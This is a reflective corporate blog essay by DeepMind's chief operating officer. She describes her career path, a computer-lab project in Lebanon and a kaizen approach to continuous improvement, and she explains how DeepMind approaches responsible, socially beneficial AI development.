Building a culture of pioneering responsibly
December 21, 2024

How to ensure we benefit society with the most impactful technology being developed today

As chief operating officer of one of the world’s leading artificial intelligence labs, I spend a lot of time thinking about how our technologies impact people’s lives – and how we can ensure that our efforts have a positive outcome. This is the focus of my work, and the critical message I bring when I meet world leaders and key figures in our industry. For instance, it was at the forefront of the panel discussion on ‘Equity Through Technology’ that I hosted this week at the World Economic Forum in Davos, Switzerland.

Inspired by the important conversations taking place at Davos on building a greener, fairer, better world, I wanted to share a few reflections on my own journey as a technology leader, along with some insight into how we at DeepMind are approaching the challenge of building technology that truly benefits the global community.

In 2000, I took a sabbatical from my job at Intel to visit the orphanage in Lebanon where my father was raised. For two months, I worked to install 20 PCs in the orphanage’s first computer lab, and to train the students and teachers to use them. The trip started out as a way to honour my dad. But being in a place with such limited technical infrastructure also gave me a new perspective on my own work. I realised that without real effort by the technology community, many of the products I was building at Intel would be inaccessible to millions of people. I became acutely aware of how that gap in access was exacerbating inequality; even as computers solved problems and accelerated progress in some parts of the world, others were being left further behind.

After that first trip to Lebanon, I started reevaluating my career priorities. I had always wanted to be part of building groundbreaking technology. But when I returned to the US, my focus narrowed to helping build technology that could make a positive and lasting impact on society. That led me to a variety of roles at the intersection of education and technology, including co-founding Team4Tech, a non-profit that works to improve access to technology for students in developing countries.

When I joined DeepMind as COO in 2018, I did so in large part because I could tell that the founders and team had the same focus on positive social impact. In fact, at DeepMind, we now champion a term that perfectly captures my own values and hopes for integrating technology into people’s daily lives: pioneering responsibly.

I believe pioneering responsibly should be a priority for anyone working in tech. But I also recognise that it’s especially important when it comes to powerful, widespread technologies like artificial intelligence. AI is arguably the most impactful technology being developed today. It has the potential to benefit humanity in innumerable ways – from combating climate change to preventing and treating disease. But it’s essential that we account for both its positive and negative downstream impacts. For example, we need to design AI systems carefully and thoughtfully to avoid amplifying human biases, such as in the contexts of hiring and policing.

The good news is that if we’re continuously questioning our own assumptions about how AI can, and should, be built and used, we can build this technology in a way that truly benefits everyone. This requires inviting discussion and debate, iterating as we learn, building in social and technical safeguards, and seeking out diverse perspectives. At DeepMind, everything we do stems from our company mission of solving intelligence to advance society and benefit humanity, and building a culture of pioneering responsibly is essential to making this mission a reality.

What does pioneering responsibly look like in practice? I believe it starts with creating space for open, honest conversations about responsibility within an organisation. One place where we’ve done this at DeepMind is in our multidisciplinary leadership group, which advises on the potential risks and social impact of our research.

Evolving our ethical governance and formalising this group was one of my first initiatives when I joined the company – and in a somewhat unconventional move, I didn’t give it a name or even a specific objective until we’d met several times. I wanted us to focus on the operational and practical aspects of responsibility, starting with an expectation-free space in which everyone could talk candidly about what pioneering responsibly meant to them. Those conversations were critical to establishing a shared vision and mutual trust – which allowed us to have more open discussions going forward.

Another element of pioneering responsibly is embracing a kaizen philosophy and approach. I was introduced to the term kaizen in the 1990s, when I moved to Tokyo to work on DVD technology standards for Intel. It’s a Japanese word that translates to “continuous improvement” – and in the simplest sense, a kaizen process is one in which small, incremental improvements, made continuously over time, lead to a more efficient and ideal system. But it’s the mindset behind the process that really matters. For kaizen to work, everyone who touches the system has to be watching for weaknesses and opportunities to improve. That means everyone has to have both the humility to admit that something might be broken, and the optimism to believe they can change it for the better.

During my time as COO of the online learning company Coursera, we used a kaizen approach to optimise our course structure. When I joined Coursera in 2013, courses on the platform had strict deadlines, and each course was offered just a few times a year. We quickly learned that this didn’t provide enough flexibility, so we pivoted to a completely on-demand, self-paced format. Enrolment went up, but completion rates dropped – it turns out that while too much structure is stressful and inconvenient, too little leads to people losing motivation. So we pivoted again, to a format where course sessions start several times a month, and learners work toward suggested weekly milestones. It took time and effort to get there, but continuous improvement eventually led to a solution that allowed people to fully benefit from their learning experience.

In the example above, our kaizen approach was largely effective because we asked our learner community for feedback and listened to their concerns. This is another crucial part of pioneering responsibly: acknowledging that we don’t have all the answers, and building relationships that allow us to continually tap into outside input.

For DeepMind, that sometimes means consulting with experts on topics like security, privacy, bioethics, and psychology. It can also mean reaching out to diverse communities of people who are directly impacted by our technology, and inviting them into a discussion about what they want and need. And sometimes, it means just listening to the people in our lives – regardless of their technical or scientific background – when they talk about their hopes for the future of AI.

Fundamentally, pioneering responsibly means prioritising initiatives focused on ethics and social impact. A growing area of focus in our research at DeepMind is how we can make AI systems more equitable and inclusive. In the past two years, we’ve published research on decolonial AI, queer fairness in AI, mitigating ethical and social risks in AI language models, and more. At the same time, we’re also working to increase diversity in the field of AI through our dedicated scholarship programmes. Internally, we recently started hosting Responsible AI Community sessions that bring together different teams and efforts working on safety, ethics, and governance – and several hundred people have signed up to get involved.

I’m inspired by the enthusiasm for this work among our employees and deeply proud of all of my DeepMind colleagues who keep social impact front and centre. Through making sure technology benefits those who need it most, I believe we can make real headway on the challenges facing our society today. In that sense, pioneering responsibly is a moral imperative – and personally, I can’t think of a better way forward.
